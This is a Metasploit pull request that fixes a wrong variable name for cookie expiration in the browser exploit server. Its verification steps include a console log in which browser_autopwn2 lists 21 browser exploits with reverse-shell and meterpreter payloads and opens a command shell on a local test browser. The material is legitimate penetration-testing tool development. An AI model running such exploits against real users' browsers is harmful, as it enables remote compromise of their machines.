### PR TITLE
use the correct variable for cookie expiration in BAP2 / web exploits

### DIFF
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -521,7 +521,7 @@ module Msf
       if datastore['CookieExpiration'].present?
         expires_date = (DateTime.now + 365*datastore['CookieExpiration'].to_i)
         expires_str  = expires_date.to_time.strftime("%a, %d %b %Y 12:00:00 GMT")
-        cookie << " Expires=#{expires};"
+        cookie << " Expires=#{expires_str};"
       end
       cookie
     end


### PR DESCRIPTION
This fixes #6911 by using the correct expiration variable when setting a cookie.
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use auxiliary/server/browser_autopwn2`
- [x] `set CookieExpiration 1`
- [x] run
- [x] connect with an vulnerable browser, e.g. Firefox 23
- [x] **Verify** that the exploit works and there are no errors

```
msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf auxiliary(browser_autopwn2) > set CookieExpiration 1
CookieExpiration => 1
msf auxiliary(browser_autopwn2) > run
[*] Auxiliary module execution completed

[*] Searching BES exploits, please wait...
msf auxiliary(browser_autopwn2) > [*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 10.150115


use the correct variable for cookie expiration
[*] Using URL: http://0.0.0.0:8080/bHDUbppe58Rk
[*] Starting the payload handler...
[*] Local IP: http://127.0.0.1:8080/bHDUbppe58Rk

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank       Name                                       Payload
 -----  ----       ----                                       -------
 1      Excellent  firefox_webidl_injection                   firefox/shell_reverse_tcp on 4442
 2      Excellent  firefox_tostring_console_injection         firefox/shell_reverse_tcp on 4442
 3      Excellent  firefox_svg_plugin                         firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_proto_crmfrequest                  firefox/shell_reverse_tcp on 4442
 5      Excellent  webview_addjavascriptinterface             android/meterpreter/reverse_tcp on 4443
 6      Excellent  samsung_knox_smdm_url                      android/meterpreter/reverse_tcp on 4443
 7      Great      adobe_flash_hacking_team_uaf               windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_domain_memory_uaf              windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_copy_pixels_to_byte_array      windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_casi32_int_overflow            windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_uncompress_zlib_uaf            windows/meterpreter/reverse_tcp on 4444
 12     Great      adobe_flash_shader_job_overflow            windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_shader_drawing_fill            windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_pixel_bender_bof               windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_opaque_background_uaf          windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_net_connection_confusion       windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_nellymoser_bof                 windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_worker_byte_array_uaf          windows/meterpreter/reverse_tcp on 4444
 19     Good       wellintech_kingscada_kxclientdownload      windows/meterpreter/reverse_tcp on 4444
 20     Good       ms14_064_ole_code_execution                windows/meterpreter/reverse_tcp on 4444
 21     Good       adobe_flash_uncompress_zlib_uninitialized  windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://127.0.0.1:8080/bHDUbppe58Rk
[*] Server started.
[*] Starting the payload handler...
[*] Gathering target information.
[*] Sending HTML response.
[*] Command shell session 1 opened (127.0.0.1:4442 -> 127.0.0.1:51710) at 2016-05-24 07:16:17 -0500
[*] Session ID 1 (127.0.0.1:4442 -> 127.0.0.1:51710) processing InitialAutoRunScript 'migrate -f'
[-] Error: Command shell sessions do not support migration


```
